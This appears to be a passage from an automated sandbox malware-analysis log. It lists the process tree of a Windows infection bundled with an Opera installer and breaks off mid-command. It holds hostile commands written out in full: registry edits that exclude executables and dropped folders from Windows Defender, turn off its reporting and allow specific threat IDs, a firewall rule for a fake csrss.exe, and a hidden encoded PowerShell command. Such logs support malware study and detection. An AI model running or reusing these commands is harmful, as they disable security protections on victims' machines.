C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3708 -ip 37081⤵PID:1384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 488 -ip 4881⤵PID:2156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3708 -ip 37081⤵PID:3864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3708 -ip 37081⤵PID:1372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3708 -ip 37081⤵PID:4084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 488 -ip 4881⤵PID:2096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3708 -ip 37081⤵PID:4508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 488 -ip 4881⤵PID:2588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1396 -ip 13961⤵PID:3508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2044 -ip 20441⤵PID:4260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2044 -ip 20441⤵PID:3484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2044 -ip 20441⤵PID:896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1396 -ip 13961⤵PID:4676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1396 -ip 13961⤵PID:4464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2044 -ip 20441⤵PID:4220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2044 -ip 20441⤵PID:4504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1396 -ip 13961⤵PID:2476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2044 -ip 20441⤵PID:2820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2044 -ip 20441⤵PID:236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1396 -ip 13961⤵PID:2648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1396 -ip 13961⤵PID:4212
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2044 -ip 20441⤵PID:2592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1396 -ip 13961⤵PID:4948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1396 -ip 13961⤵PID:2196
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:321⤵PID:2648
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:641⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\IgCBQGLVZvnO0Gn4aYk2USBy.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\IgCBQGLVZvnO0Gn4aYk2USBy.exe" --version1⤵PID:3000
-
C:\Users\Admin\Pictures\IgCBQGLVZvnO0Gn4aYk2USBy.exe"C:\Users\Admin\Pictures\IgCBQGLVZvnO0Gn4aYk2USBy.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4276 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240204205407" --session-guid=b07962b7-fa43-43da-a06a-adcb1cb2e345 --server-tracking-blob=YWVjMTc4ZTI5NmU5Yzc3NzUyZDBiMGNjMDJjNzRhNTdlMDIxYjUzZmVhZmY3NThlZDg3ZGU1YWIyNzBjMDI0MDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNzA4MDA0MS42NDAxIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI5NDQ2ZjQ3NC0xNjM3LTQyY2YtYjQxNS1hODc3YzZmMjNjMWIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=70040000000000001⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:4532 -
C:\Users\Admin\Pictures\IgCBQGLVZvnO0Gn4aYk2USBy.exeC:\Users\Admin\Pictures\IgCBQGLVZvnO0Gn4aYk2USBy.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x30c,0x310,0x314,0x2dc,0x318,0x6da69558,0x6da69564,0x6da695702⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3700
-
-
C:\Users\Admin\Pictures\IgCBQGLVZvnO0Gn4aYk2USBy.exeC:\Users\Admin\Pictures\IgCBQGLVZvnO0Gn4aYk2USBy.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x300,0x304,0x308,0x2dc,0x30c,0x6e9a9558,0x6e9a9564,0x6e9a95701⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4652
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:641⤵PID:1700
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵PID:3028
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:5024
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:2152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:1292
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2044 -ip 20441⤵PID:1960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1396 -ip 13961⤵PID:2512
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:5024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 488 -ip 4881⤵PID:4668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3708 -ip 37081⤵PID:2772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 488 -ip 4881⤵PID:2820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3708 -ip 37081⤵PID:4656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 488 -ip 4881⤵PID:1268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 488 -ip 4881⤵PID:2740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 488 -ip 4881⤵PID:4332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 488 -ip 4881⤵PID:2012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1396 -ip 13961⤵PID:2916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3708 -ip 37081⤵PID:1820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5028 -ip 50281⤵PID:3508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5028 -ip 50281⤵PID:4876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2044 -ip 20441⤵PID:1416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5028 -ip 50281⤵PID:3556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2044 -ip 20441⤵PID:2992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5028 -ip 50281⤵PID:2592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5028 -ip 50281⤵PID:3816
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5028 -ip 50281⤵PID:4220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5028 -ip 50281⤵PID:2396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5028 -ip 50281⤵PID:4352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5028 -ip 50281⤵PID:3372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5028 -ip 50281⤵PID:636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5028 -ip 50281⤵PID:3028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5028 -ip 50281⤵PID:916
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:1600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5028 -ip 50281⤵PID:1880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5028 -ip 50281⤵PID:2256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5028 -ip 50281⤵PID:2328
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\ODAyBFZ.exeC:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\ODAyBFZ.exe Lc /wKsite_idtLu 385118 /S1⤵PID:1356
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:2920
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:748
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:936
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AplGwAcKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AplGwAcKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TewsSzADpkOsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TewsSzADpkOsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZmXCVzpeviUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZmXCVzpeviUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hzVOasbgcFlU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hzVOasbgcFlU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cAagwmwWSSyWmtVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cAagwmwWSSyWmtVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 